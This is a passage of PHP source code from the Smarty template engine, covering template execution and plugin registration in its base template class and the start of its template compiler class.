 * @method Smarty_Internal_TemplateBase registerClass(string $class_name, string $class_impl)
 * @method Smarty_Internal_TemplateBase registerDefaultConfigHandler(callback $callback)
 * @method Smarty_Internal_TemplateBase registerDefaultPluginHandler(callback $callback)
 * @method Smarty_Internal_TemplateBase registerDefaultTemplateHandler(callback $callback)
 * @method Smarty_Internal_TemplateBase registerResource(string $name, mixed $resource_handler)
 * @method Smarty_Internal_TemplateBase setAutoloadFilters(mixed $filters, string $type = null)
 * @method Smarty_Internal_TemplateBase setDebugTemplate(string $tpl_name)
 * @method Smarty_Internal_TemplateBase setDefaultModifiers(mixed $modifiers)
 * @method Smarty_Internal_TemplateBase setLiterals(mixed $literals)
 * @method Smarty_Internal_TemplateBase unloadFilter(string $type, string $name)
 * @method Smarty_Internal_TemplateBase unregisterCacheResource(string $name)
 * @method Smarty_Internal_TemplateBase unregisterObject(string $object_name)
 * @method Smarty_Internal_TemplateBase unregisterPlugin(string $type, string $name)
 * @method Smarty_Internal_TemplateBase unregisterFilter(string $type, mixed $callback)
 * @method Smarty_Internal_TemplateBase unregisterResource(string $name)
 */
abstract class Smarty_Internal_TemplateBase extends Smarty_Internal_Data
{
    /**
     * Set this if you want different sets of cache files for the same
     * templates.
     *
     * @var string
     */
    public $cache_id = null;

    /**
     * Set this if you want different sets of compiled files for the same
     * templates.
     *
     * @var string
     */
    public $compile_id = null;

    /**
     * caching enabled
     *
     * @var int
     */
    public $caching = Smarty::CACHING_OFF;

    /**
     * check template for modifications?
     *
     * @var int
     */
    public $compile_check = Smarty::COMPILECHECK_ON;

    /**
     * cache lifetime in seconds
     *
     * @var integer
     */
    public $cache_lifetime = 3600;

    /**
     * Array of source information for known template functions
     *
     * @var array
     */
    public $tplFunctions = array();

    /**
     * universal cache
     *
     * @var array()
     */
    public $_cache = array();

    /**
     * fetches a rendered Smarty template
     *
     * @param string $template   the resource handle of the template file or template object
     * @param mixed  $cache_id   cache id to be used with this template
     * @param mixed  $compile_id compile id to be used with this template
     * @param object $parent     next higher level of Smarty variables
     *
     * @throws Exception
     * @throws SmartyException
     * @return string rendered template output
     */
    public function fetch($template = null, $cache_id = null, $compile_id = null, $parent = null)
    {
        $result = $this->_execute($template, $cache_id, $compile_id, $parent, 0);
        return $result === null ? ob_get_clean() : $result;
    }

    /**
     * displays a Smarty template
     *
     * @param string $template   the resource handle of the template file or template object
     * @param mixed  $cache_id   cache id to be used with this template
     * @param mixed  $compile_id compile id to be used with this template
     * @param object $parent     next higher level of Smarty variables
     *
     * @throws \Exception
     * @throws \SmartyException
     */
    public function display($template = null, $cache_id = null, $compile_id = null, $parent = null)
    {
        // display template
        $this->_execute($template, $cache_id, $compile_id, $parent, 1);
    }

    /**
     * test if cache is valid
     *
     * @api  Smarty::isCached()
     * @link https://www.smarty.net/docs/en/api.is.cached.tpl
     *
     * @param null|string|\Smarty_Internal_Template $template   the resource handle of the template file or template
     *                                                          object
     * @param mixed                                 $cache_id   cache id to be used with this template
     * @param mixed                                 $compile_id compile id to be used with this template
     * @param object                                $parent     next higher level of Smarty variables
     *
     * @return bool cache status
     * @throws \Exception
     * @throws \SmartyException
     */
    public function isCached($template = null, $cache_id = null, $compile_id = null, $parent = null)
    {
        return $this->_execute($template, $cache_id, $compile_id, $parent, 2);
    }

    /**
     * fetches a rendered Smarty template
     *
     * @param string $template   the resource handle of the template file or template object
     * @param mixed  $cache_id   cache id to be used with this template
     * @param mixed  $compile_id compile id to be used with this template
     * @param object $parent     next higher level of Smarty variables
     * @param string $function   function type 0 = fetch,  1 = display, 2 = isCache
     *
     * @return mixed
     * @throws \Exception
     * @throws \SmartyException
     */
    private function _execute($template, $cache_id, $compile_id, $parent, $function)
    {
        $smarty = $this->_getSmartyObj();
        $saveVars = true;
        if ($template === null) {
            if (!$this->_isTplObj()) {
                throw new SmartyException($function . '():Missing \'$template\' parameter');
            } else {
                $template = $this;
            }
        } elseif (is_object($template)) {
            /* @var Smarty_Internal_Template $template */
            if (!isset($template->_objType) || !$template->_isTplObj()) {
                throw new SmartyException($function . '():Template object expected');
            }
        } else {
            // get template object
            $saveVars = false;
            $template = $smarty->createTemplate($template, $cache_id, $compile_id, $parent ? $parent : $this, false);
            if ($this->_objType === 1) {
                // set caching in template object
                $template->caching = $this->caching;
            }
        }
        // make sure we have integer values
        $template->caching = (int)$template->caching;
        // fetch template content
        $level = ob_get_level();
        try {
            $_smarty_old_error_level =
                isset($smarty->error_reporting) ? error_reporting($smarty->error_reporting) : null;

            if ($smarty->isMutingUndefinedOrNullWarnings()) {
                $errorHandler = new Smarty_Internal_ErrorHandler();
                $errorHandler->activate();
            }

            if ($this->_objType === 2) {
                /* @var Smarty_Internal_Template $this */
                $template->tplFunctions = $this->tplFunctions;
                $template->inheritance = $this->inheritance;
            }
            /* @var Smarty_Internal_Template $parent */
            if (isset($parent->_objType) && ($parent->_objType === 2) && !empty($parent->tplFunctions)) {
                $template->tplFunctions = array_merge($parent->tplFunctions, $template->tplFunctions);
            }
            if ($function === 2) {
                if ($template->caching) {
                    // return cache status of template
                    if (!isset($template->cached)) {
                        $template->loadCached();
                    }
                    $result = $template->cached->isCached($template);
                    Smarty_Internal_Template::$isCacheTplObj[ $template->_getTemplateId() ] = $template;
                } else {
                    return false;
                }
            } else {
                if ($saveVars) {
                    $savedTplVars = $template->tpl_vars;
                    $savedConfigVars = $template->config_vars;
                }
                ob_start();
                $template->_mergeVars();
                if (!empty(Smarty::$global_tpl_vars)) {
                    $template->tpl_vars = array_merge(Smarty::$global_tpl_vars, $template->tpl_vars);
                }
                $result = $template->render(false, $function);
                $template->_cleanUp();
                if ($saveVars) {
                    $template->tpl_vars = $savedTplVars;
                    $template->config_vars = $savedConfigVars;
                } else {
                    if (!$function && !isset(Smarty_Internal_Template::$tplObjCache[ $template->templateId ])) {
                        $template->parent = null;
                        $template->tpl_vars = $template->config_vars = array();
                        Smarty_Internal_Template::$tplObjCache[ $template->templateId ] = $template;
                    }
                }
            }

            if (isset($errorHandler)) {
                $errorHandler->deactivate();
            }

            if (isset($_smarty_old_error_level)) {
                error_reporting($_smarty_old_error_level);
            }
            return $result;
        } catch (Throwable $e) {
            while (ob_get_level() > $level) {
                ob_end_clean();
            }
            if (isset($errorHandler)) {
                $errorHandler->deactivate();
            }

            if (isset($_smarty_old_error_level)) {
                error_reporting($_smarty_old_error_level);
            }
            throw $e;
        }
    }

    /**
     * Registers plugin to be used in templates
     *
     * @api  Smarty::registerPlugin()
     * @link https://www.smarty.net/docs/en/api.register.plugin.tpl
     *
     * @param string   $type       plugin type
     * @param string   $name       name of template tag
     * @param callable $callback   PHP callback to register
     * @param bool     $cacheable  if true (default) this function is cache able
     * @param mixed    $cache_attr caching attributes if any
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function registerPlugin($type, $name, $callback, $cacheable = true, $cache_attr = null)
    {
        return $this->ext->registerPlugin->registerPlugin($this, $type, $name, $callback, $cacheable, $cache_attr);
    }

    /**
     * load a filter of specified type and name
     *
     * @api  Smarty::loadFilter()
     * @link https://www.smarty.net/docs/en/api.load.filter.tpl
     *
     * @param string $type filter type
     * @param string $name filter name
     *
     * @return bool
     * @throws \SmartyException
     */
    public function loadFilter($type, $name)
    {
        return $this->ext->loadFilter->loadFilter($this, $type, $name);
    }

    /**
     * Registers a filter function
     *
     * @api  Smarty::registerFilter()
     * @link https://www.smarty.net/docs/en/api.register.filter.tpl
     *
     * @param string      $type filter type
     * @param callable    $callback
     * @param string|null $name optional filter name
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function registerFilter($type, $callback, $name = null)
    {
        return $this->ext->registerFilter->registerFilter($this, $type, $callback, $name);
    }

    /**
     * Registers object to be used in templates
     *
     * @api  Smarty::registerObject()
     * @link https://www.smarty.net/docs/en/api.register.object.tpl
     *
     * @param string $object_name
     * @param object $object                     the referenced PHP object to register
     * @param array  $allowed_methods_properties list of allowed methods (empty = all)
     * @param bool   $format                     smarty argument format, else traditional
     * @param array  $block_methods              list of block-methods
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function registerObject(
        $object_name,
        $object,
        $allowed_methods_properties = array(),
        $format = true,
        $block_methods = array()
    ) {
        return $this->ext->registerObject->registerObject(
            $this,
            $object_name,
            $object,
            $allowed_methods_properties,
            $format,
            $block_methods
        );
    }

    /**
     * @param int $compile_check
     */
    public function setCompileCheck($compile_check)
    {
        $this->compile_check = (int)$compile_check;
    }

    /**
     * @param int $caching
     */
    public function setCaching($caching)
    {
        $this->caching = (int)$caching;
    }

    /**
     * @param int $cache_lifetime
     */
    public function setCacheLifetime($cache_lifetime)
    {
        $this->cache_lifetime = $cache_lifetime;
    }

    /**
     * @param string $compile_id
     */
    public function setCompileId($compile_id)
    {
        $this->compile_id = $compile_id;
    }

    /**
     * @param string $cache_id
     */
    public function setCacheId($cache_id)
    {
        $this->cache_id = $cache_id;
    }
}
<?php
/**
 * Smarty Internal Plugin Smarty Template Compiler Base
 * This file contains the basic classes and methods for compiling Smarty templates with lexer/parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Main abstract compiler class
 *
 * @package    Smarty
 * @subpackage Compiler
 *
 * @property Smarty_Internal_SmartyTemplateCompiler $prefixCompiledCode  = ''
 * @property Smarty_Internal_SmartyTemplateCompiler $postfixCompiledCode = ''
 * @method   registerPostCompileCallback($callback, $parameter = array(), $key = null, $replace = false)
 * @method   unregisterPostCompileCallback($key)
 */
abstract class Smarty_Internal_TemplateCompilerBase
{
    /**
     * compile tag objects cache
     *
     * @var array
     */
    public static $_tag_objects = array();

    /**
     * counter for prefix variable number
     *
     * @var int
     */
    public static $prefixVariableNumber = 0;

    /**
     * Smarty object
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * Parser object
     *
     * @var Smarty_Internal_Templateparser
     */
    public $parser = null;

    /**
     * hash for nocache sections
     *
     * @var mixed
     */
    public $nocache_hash = null;

    /**
     * suppress generation of nocache code
     *
     * @var bool
     */
    public $suppressNocacheProcessing = false;

    /**
     * caching enabled (copied from template object)
     *
     * @var int
     */
    public $caching = 0;

    /**
     * tag stack
     *
     * @var array
     */
    public $_tag_stack = array();

    /**
     * tag stack count
     *
     * @var array
     */
    public $_tag_stack_count = array();

    /**
     * Plugins used by template
     *
     * @var array
     */
    public $required_plugins = array('compiled' => array(), 'nocache' => array());

    /**
     * Required plugins stack
     *
     * @var array
     */
    public $required_plugins_stack = array();

    /**
     * current template
     *
     * @var Smarty_Internal_Template
     */
    public $template = null;

    /**
     * merged included sub template data
     *
     * @var array
     */
    public $mergedSubTemplatesData = array();

    /**
     * merged sub template code
     *
     * @var array
     */
    public $mergedSubTemplatesCode = array();

    /**
     * collected template properties during compilation
     *
     * @var array
     */
    public $templateProperties = array();

    /**
     * source line offset for error messages
     *
     * @var int
     */
    public $trace_line_offset = 0;

    /**
     * trace uid
     *
     * @var string
     */
    public $trace_uid = '';

    /**
     * trace file path
     *
     * @var string
     */
    public $trace_filepath = '';

    /**
     * stack for tracing file and line of nested {block} tags
     *
     * @var array
     */
    public $trace_stack = array();

    /**
     * plugins loaded by default plugin handler
     *
     * @var array
     */
    public $default_handler_plugins = array();

    /**
     * saved preprocessed modifier list
     *
     * @var mixed
     */
    public $default_modifier_list = null;

    /**
     * force compilation of complete template as nocache
     *
     * @var boolean
     */
    public $forceNocache = false;

    /**
     * flag if compiled template file shall we written
     *
     * @var bool
     */
    public $write_compiled_code = true;

    /**
     * Template functions
     *
     * @var array
     */
    public $tpl_function = array();

    /**
     * called sub functions from template function
     *
     * @var array
     */
    public $called_functions = array();

    /**
     * compiled template or block function code
     *
     * @var string
     */
    public $blockOrFunctionCode = '';

    /**
     * flags for used modifier plugins
     *
     * @var array
     */
    public $modifier_plugins = array();

    /**
     * type of already compiled modifier
     *
     * @var array
     */
    public $known_modifier_type = array();

    /**
     * parent compiler object for merged subtemplates and template functions
     *
     * @var Smarty_Internal_TemplateCompilerBase
     */
    public $parent_compiler = null;

    /**
     * Flag true when compiling nocache section
     *
     * @var bool
     */
    public $nocache = false;

    /**
     * Flag true when tag is compiled as nocache
     *
     * @var bool
     */
    public $tag_nocache = false;

    /**
     * Compiled tag prefix code
     *
     * @var array
     */
    public $prefix_code = array();

    /**
     * used prefix variables by current compiled tag
     *
     * @var array
     */
    public $usedPrefixVariables = array();

    /**
     * Prefix code  stack
     *
     * @var array
     */
    public $prefixCodeStack = array();

    /**
     * Tag has compiled code
     *
     * @var bool
     */
    public $has_code = false;

    /**
     * A variable string was compiled
     *
     * @var bool
     */
    public $has_variable_string = false;

    /**
     * Stack for {setfilter} {/setfilter}
     *
     * @var array
     */
    public $variable_filter_stack = array();

    /**
     * variable filters for {setfilter} {/setfilter}
     *
     * @var array
     */
    public $variable_filters = array();

    /**
     * Nesting count of looping tags like {foreach}, {for}, {section}, {while}
     *
     * @var int
     */
    public $loopNesting = 0;

    /**
     * Strip preg pattern
     *
     * @var string
     */
    public $stripRegEx = '![\t ]*[\r\n]+[\t ]*!';

    /**
     * plugin search order
     *
     * @var array
     */
    public $plugin_search_order = array(
        'function',
        'block',
        'compiler',
        'class'
    );

    /**
     * General storage area for tag compiler plugins
     *
     * @var array
     */
    public $_cache = array();

    /**
     * Lexer preg pattern for left delimiter
     *
     * @var string
     */
    private $ldelPreg = '[{]';

    /**
     * Lexer preg pattern for right delimiter
     *
     * @var string
     */
    private $rdelPreg = '[}]';

    /**
     * Length of right delimiter
     *
     * @var int
     */
    private $rdelLength = 0;

    /**
     * Length of left delimiter
     *
     * @var int
     */
    private $ldelLength = 0;

    /**
     * Lexer preg pattern for user literals
     *
     * @var string
     */
    private $literalPreg = '';

    /**
     * Initialize compiler
     *
     * @param Smarty $smarty global instance
     */
    public function __construct(Smarty $smarty)
    {
        $this->smarty = $smarty;
        $this->nocache_hash = str_replace(
            array(
                '.',
                ','
            ),
            '_',
            uniqid(mt_rand(), true)
        );
    }

    /**
     * Method to compile a Smarty template
     *
     * @param Smarty_Internal_Template                  $template template object to compile
     * @param bool                                      $nocache  true is shall be compiled in nocache mode
     * @param null|Smarty_Internal_TemplateCompilerBase $parent_compiler
     *
     * @return bool true if compiling succeeded, false if it failed
     * @throws \Exception
     */
    public function compileTemplate(
        Smarty_Internal_Template $template,
        $nocache = null,
        ?Smarty_Internal_TemplateCompilerBase $parent_compiler = null
    ) {
        // get code frame of compiled template
        $_compiled_code = $template->smarty->ext->_codeFrame->create(
            $template,
            $this->compileTemplateSource(
                $template,
                $nocache,
                $parent_compiler
            ),
            $this->postFilter($this->blockOrFunctionCode) .
            join('', $this->mergedSubTemplatesCode),
            false,
            $this
        );
        return $_compiled_code;
    }

    /**
     * Compile template source and run optional post filter
     *
     * @param \Smarty_Internal_Template                  $template
     * @param null|bool                                  $nocache flag if template must be compiled in nocache mode
     * @param \Smarty_Internal_TemplateCompilerBase|null $parent_compiler
     *
     * @return string
     * @throws \Exception
     */
    public function compileTemplateSource(
        Smarty_Internal_Template $template,
        $nocache = null,
        ?Smarty_Internal_TemplateCompilerBase $parent_compiler = null
    ) {
        try {
            // save template object in compiler class
            $this->template = $template;
            if ($this->smarty->debugging) {
                if (!isset($this->smarty->_debug)) {
                    $this->smarty->_debug = new Smarty_Internal_Debug();
                }
                $this->smarty->_debug->start_compile($this->template);
            }
            $this->parent_compiler = $parent_compiler ? $parent_compiler : $this;
            $nocache = isset($nocache) ? $nocache : false;
            if (empty($template->compiled->nocache_hash)) {
                $template->compiled->nocache_hash = $this->nocache_hash;
            } else {
                $this->nocache_hash = $template->compiled->nocache_hash;
            }
            $this->caching = $template->caching;
            // flag for nocache sections
            $this->nocache = $nocache;
            $this->tag_nocache = false;
            // reset has nocache code flag
            $this->template->compiled->has_nocache_code = false;
            $this->has_variable_string = false;
            $this->prefix_code = array();
            // add file dependency
            if ($this->smarty->merge_compiled_includes || $this->template->source->handler->checkTimestamps()) {
                $this->parent_compiler->template->compiled->file_dependency[ $this->template->source->uid ] =
                    array(
                        $this->template->source->filepath,
                        $this->template->source->getTimeStamp(),
                        $this->template->source->type,
                    );
            }
            $this->smarty->_current_file = $this->template->source->filepath;
            // get template source
            if (!empty($this->template->source->components)) {
				$_compiled_code = '<?php $_smarty_tpl->_loadInheritance(); $_smarty_tpl->inheritance->init($_smarty_tpl, true); ?>';

				$i = 0;
				$reversed_components = array_reverse($this->template->getSource()->components);
				foreach ($reversed_components as $source) {
					$i++;
					if ($i === count($reversed_components)) {
						$_compiled_code .= '<?php $_smarty_tpl->inheritance->endChild($_smarty_tpl); ?>';
					}
					$_compiled_code .= $this->compileTag(
						'include',
						[
							var_export($source->resource, true),
							['scope' => 'parent'],
						]
					);
				}
				$_compiled_code = $this->postFilter($_compiled_code, $this->template);
            } else {
                // get template source
                $_content = $this->template->source->getContent();
				$_compiled_code = $this->postFilter($this->doCompile($this->preFilter($_content), true));
            }
            if (!empty($this->required_plugins[ 'compiled' ]) || !empty($this->required_plugins[ 'nocache' ])) {
                $_compiled_code = '<?php ' . $this->compileRequiredPlugins() . "?>\n" . $_compiled_code;
            }
        } catch (Exception $e) {
            if ($this->smarty->debugging) {
                $this->smarty->_debug->end_compile($this->template);
            }
            $this->_tag_stack = array();
            // free memory
            $this->parent_compiler = null;
            $this->template = null;
            $this->parser = null;
            throw $e;
        }
        if ($this->smarty->debugging) {
            $this->smarty->_debug->end_compile($this->template);
        }
        $this->parent_compiler = null;
        $this->parser = null;
        return $_compiled_code;
    }

    /**
     * Optionally process compiled code by post filter
     *
     * @param string $code compiled code
     *
     * @return string
     * @throws \SmartyException
     */
    public function postFilter($code)
    {
        // run post filter if on code
        if (!empty($code)
            && (isset($this->smarty->autoload_filters[ 'post' ]) || isset($this->smarty->registered_filters[ 'post' ]))
        ) {
            return $this->smarty->ext->_filterHandler->runFilter('post', $code, $this->template);
        } else {
            return $code;
        }
    }

    /**
     * Run optional prefilter
     *
     * @param string $_content template source
     *
     * @return string
     * @throws \SmartyException
     */
    public function preFilter($_content)
    {
        // run pre filter if required
        if ($_content !== ''
            && ((isset($this->smarty->autoload_filters[ 'pre' ]) || isset($this->smarty->registered_filters[ 'pre' ])))
        ) {
            return $this->smarty->ext->_filterHandler->runFilter('pre', $_content, $this->template);
        } else {
            return $_content;
        }
    }

    /**
     * Compile Tag
     * This is a call back from the lexer/parser
     *
     * Save current prefix code
     * Compile tag
     * Merge tag prefix code with saved one
     * (required nested tags in attributes)
     *
     * @param string $tag       tag name
     * @param array  $args      array with tag attributes
     * @param array  $parameter array with compilation parameter
     *
     * @throws SmartyCompilerException
     * @throws SmartyException
     * @return string compiled code
     */
    public function compileTag($tag, $args, $parameter = array())
    {
        $this->prefixCodeStack[] = $this->prefix_code;
        $this->prefix_code = array();
        $result = $this->compileTag2($tag, $args, $parameter);
        $this->prefix_code = array_merge($this->prefix_code, array_pop($this->prefixCodeStack));
        return $result;
    }

    /**
     * compile variable
     *
     * @param string $variable
     *
     * @return string
     */
    public function compileVariable($variable)
    {
        if (!strpos($variable, '(')) {
            // not a variable variable
            $var = trim($variable, '\'');
            $this->tag_nocache = $this->tag_nocache |
                                 $this->template->ext->getTemplateVars->_getVariable(
                                     $this->template,
                                     $var,
                                     null,
                                     true,
                                     false
                                 )->nocache;
            // todo $this->template->compiled->properties['variables'][$var] = $this->tag_nocache | $this->nocache;
        }
        return '$_smarty_tpl->tpl_vars[' . $variable . ']->value';
    }

    /**
     * compile config variable
     *
     * @param string $variable
     *
     * @return string
     */
    public function compileConfigVariable($variable)
    {
        // return '$_smarty_tpl->config_vars[' . $variable . ']';
        return '$_smarty_tpl->smarty->ext->configLoad->_getConfigVariable($_smarty_tpl, ' . $variable . ')';
    }

    /**
     * compile PHP function call
     *
     * @param string $name
     * @param array  $parameter
     *
     * @return string
     * @throws \SmartyCompilerException
     */
    public function compilePHPFunctionCall($name, $parameter)
    {
        if (!$this->smarty->security_policy || $this->smarty->security_policy->isTrustedPhpFunction($name, $this)) {
            if (strcasecmp($name, 'isset') === 0 || strcasecmp($name, 'empty') === 0
                || strcasecmp($name, 'array') === 0 || is_callable($name)
            ) {
                $func_name = smarty_strtolower_ascii($name);

                if ($func_name === 'isset') {
                    if (count($parameter) === 0) {
                        $this->trigger_template_error('Illegal number of parameter in "isset()"');
                    }

                    $pa = array();
                    foreach ($parameter as $p) {
                        $pa[] = $this->syntaxMatchesVariable($p) ? 'isset(' . $p . ')' : '(' . $p . ' !== null )';
                    }
                    return '(' . implode(' && ', $pa) . ')';

                } elseif (in_array(
                    $func_name,
                    array(
                        'empty',
                        'reset',
                        'current',
                        'end',
                        'prev',
                        'next'
                    )
                )
                ) {
                    if (count($parameter) !== 1) {
                        $this->trigger_template_error("Illegal number of parameter in '{$func_name()}'");
                    }
                    if ($func_name === 'empty') {
                        return $func_name . '(' .
                               str_replace("')->value", "',null,true,false)->value", $parameter[ 0 ]) . ')';
                    } else {
                        return $func_name . '(' . $parameter[ 0 ] . ')';
                    }
                } else {

					if (
						!$this->smarty->loadPlugin('smarty_modifiercompiler_' . $name)
						&& !isset($this->smarty->registered_plugins[Smarty::PLUGIN_MODIFIER][$name])
						&& !in_array($name, ['time', 'join', 'is_array', 'in_array', 'count'])
					) {
						trigger_error('Using unregistered function "' . $name . '" in a template is deprecated and will be ' .
							'removed in a future release. Use Smarty::registerPlugin to explicitly register ' .
							'a custom modifier.', E_USER_DEPRECATED);
					}

					return $name . '(' . implode(',', $parameter) . ')';
                }
            } else {
                $this->trigger_template_error("unknown function '{$name}'");
            }
        }
    }

    /**
     * Determines whether the passed string represents a valid (PHP) variable.
     * This is important, because `isset()` only works on variables and `empty()` can only be passed
     * a variable prior to php5.5
     * @param $string
     * @return bool
     */
    private function syntaxMatchesVariable($string) {
        static $regex_pattern = '/^\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*((->)[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\[.*]*\])*$/';
        return 1 === preg_match($regex_pattern, trim($string));
    }

    /**
     * This method is called from parser to process a text content section if strip is enabled
     * - remove text from inheritance child templates as they may generate output
     *
     * @param string $text
     *
     * @return string
     */
    public function processText($text)
    {

        if (strpos($text, '<') === false) {
            return preg_replace($this->stripRegEx, '', $text);
        }

        $store = array();
        $_store = 0;

        // capture html elements not to be messed with
        $_offset = 0;
        if (preg_match_all(
            '#(<script[^>]*>.*?</script[^>]*>)|(<textarea[^>]*>.*?</textarea[^>]*>)|(<pre[^>]*>.*?</pre[^>]*>)#is',
            $text,
            $matches,
            PREG_OFFSET_CAPTURE | PREG_SET_ORDER
        )
        ) {
            foreach ($matches as $match) {
                $store[] = $match[ 0 ][ 0 ];
                $_length = strlen($match[ 0 ][ 0 ]);
                $replace = '@!@SMARTY:' . $_store . ':SMARTY@!@';
                $text = substr_replace($text, $replace, $match[ 0 ][ 1 ] - $_offset, $_length);
                $_offset += $_length - strlen($replace);
                $_store++;
            }
        }
        $expressions = array(// replace multiple spaces between tags by a single space
                             '#(:SMARTY@!@|>)[\040\011]+(?=@!@SMARTY:|<)#s'                            => '\1 \2',
                             // remove newline between tags
                             '#(:SMARTY@!@|>)[\040\011]*[\n]\s*(?=@!@SMARTY:|<)#s'                     => '\1\2',
                             // remove multiple spaces between attributes (but not in attribute values!)
                             '#(([a-z0-9]\s*=\s*("[^"]*?")|(\'[^\']*?\'))|<[a-z0-9_]+)\s+([a-z/>])#is' => '\1 \5',
                             '#>[\040\011]+$#Ss'                                                       => '> ',
                             '#>[\040\011]*[\n]\s*$#Ss'                                                => '>',
                             $this->stripRegEx                                                         => '',
        );
        $text = preg_replace(array_keys($expressions), array_values($expressions), $text);
        $_offset = 0;
        if (preg_match_all(
            '#@!@SMARTY:([0-9]+):SMARTY@!@#is',
            $text,
            $matches,
            PREG_OFFSET_CAPTURE | PREG_SET_ORDER
        )
        ) {
            foreach ($matches as $match) {
                $_length = strlen($match[ 0 ][ 0 ]);
                $replace = $store[ $match[ 1 ][ 0 ] ];
                $text = substr_replace($text, $replace, $match[ 0 ][ 1 ] + $_offset, $_length);
                $_offset += strlen($replace) - $_length;
                $_store++;
            }
        }
        return $text;
    }

    /**
     * lazy loads internal compile plugin for tag and calls the compile method
     * compile objects cached for reuse.
     * class name format:  Smarty_Internal_Compile_TagName
     * plugin filename format: Smarty_Internal_TagName.php
     *
     * @param string $tag    tag name
     * @param array  $args   list of tag attributes
     * @param mixed  $param1 optional parameter
     * @param mixed  $param2 optional parameter
     * @param mixed  $param3 optional parameter
     *
     * @return bool|string compiled code or false
     * @throws \SmartyCompilerException
     */
    public function callTagCompiler($tag, $args, $param1 = null, $param2 = null, $param3 = null)
    {
        /* @var Smarty_Internal_CompileBase $tagCompiler */
        $tagCompiler = $this->getTagCompiler($tag);
        // compile this tag
        return $tagCompiler === false ? false : $tagCompiler->compile($args, $this, $param1, $param2, $param3);
    }

    /**
     * lazy loads internal compile plugin for tag compile objects cached for reuse.
     *
     * class name format:  Smarty_Internal_Compile_TagName
     * plugin filename format: Smarty_Internal_TagName.php
     *
     * @param string $tag tag name
     *
     * @return bool|\Smarty_Internal_CompileBase tag compiler object or false if not found
     */
    public function getTagCompiler($tag)
    {
        // re-use object if already exists
        if (!isset(self::$_tag_objects[ $tag ])) {
            // lazy load internal compiler plugin
            $_tag = explode('_', $tag);
            $_tag = array_map('smarty_ucfirst_ascii', $_tag);
            $class_name = 'Smarty_Internal_Compile_' . implode('_', $_tag);
            if (class_exists($class_name)
                && (!isset($this->smarty->security_policy) || $this->smarty->security_policy->isTrustedTag($tag, $this))
            ) {
                self::$_tag_objects[ $tag ] = new $class_name;
            } else {
                self::$_tag_objects[ $tag ] = false;
            }
        }
        return self::$_tag_objects[ $tag ];
    }

    /**
     * Check for plugins and return function name
     *
     * @param        $plugin_name
     * @param string $plugin_type type of plugin
     *
     * @return string call name of function
     * @throws \SmartyException
     */
    public function getPlugin($plugin_name, $plugin_type)
    {
        $function = null;
        if ($this->caching && ($this->nocache || $this->tag_nocache)) {
            if (isset($this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ])) {
                $function =
                    $this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ][ 'function' ];
            } elseif (isset($this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ])) {
                $this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ] =
                    $this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ];
                $function =
                    $this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ][ 'function' ];
            }
        } else {
            if (isset($this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ])) {
                $function =
                    $this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ][ 'function' ];
            } elseif (isset($this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ])) {
                $this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ] =
                    $this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ];
                $function =
                    $this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ][ 'function' ];
            }
        }
        if (isset($function)) {
            if ($plugin_type === 'modifier') {
                $this->modifier_plugins[ $plugin_name ] = true;
            }
            return $function;
        }
        // loop through plugin dirs and find the plugin
        $function = 'smarty_' . $plugin_type . '_' . $plugin_name;
        $file = $this->smarty->loadPlugin($function, false);
        if (is_string($file)) {
            if ($this->caching && ($this->nocache || $this->tag_nocache)) {
                $this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ][ 'file' ] =
                    $file;
                $this->required_plugins[ 'nocache' ][ $plugin_name ][ $plugin_type ][ 'function' ] =
                    $function;
            } else {
                $this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ][ 'file' ] =
                    $file;
                $this->required_plugins[ 'compiled' ][ $plugin_name ][ $plugin_type ][ 'function' ] =
                    $function;
            }
            if ($plugin_type === 'modifier') {
                $this->modifier_plugins[ $plugin_name ] = true;
            }
            return $function;
        }
        if (is_callable($function)) {
            // plugin function is defined in the script
            return $function;
        }
        return false;
    }

    /**
     * Check for plugins by default plugin handler
     *
     * @param string $tag         name of tag
     * @param string $plugin_type type of plugin
     *
     * @return bool true if found
     * @throws \SmartyCompilerException
     */
    public function getPluginFromDefaultHandler($tag, $plugin_type)
    {
        $callback = null;
        $script = null;
        $cacheable = true;
        $result = call_user_func_array(
            $this->smarty->default_plugin_handler_func,
            array(
                $tag,
                $plugin_type,
                $this->template,
                &$callback,
                &$script,
                &$cacheable,
            )
        );
        if ($result) {
            $this->tag_nocache = $this->tag_nocache || !$cacheable;
            if ($script !== null) {
                if (is_file($script)) {
                    if ($this->caching && ($this->nocache || $this->tag_nocache)) {
                        $this->required_plugins[ 'nocache' ][ $tag ][ $plugin_type ][ 'file' ] =
                            $script;
                        $this->required_plugins[ 'nocache' ][ $tag ][ $plugin_type ][ 'function' ] =
                            $callback;
                    } else {
                        $this->required_plugins[ 'compiled' ][ $tag ][ $plugin_type ][ 'file' ] =
                            $script;
                        $this->required_plugins[ 'compiled' ][ $tag ][ $plugin_type ][ 'function' ] =
                            $callback;
                    }
                    include_once $script;
                } else {
                    $this->trigger_template_error("Default plugin handler: Returned script file '{$script}' for '{$tag}' not found");
                }
            }
            if (is_callable($callback)) {
                $this->default_handler_plugins[ $plugin_type ][ $tag ] = array(
                    $callback,
                    true,
                    array()
                );
                return true;
            } else {
                $this->trigger_template_error("Default plugin handler: Returned callback for '{$tag}' not callable");
            }
        }
        return false;
    }

    /**
     * Append code segments and remove unneeded ?> <?php transitions
     *
     * @param string $left
     * @param string $right
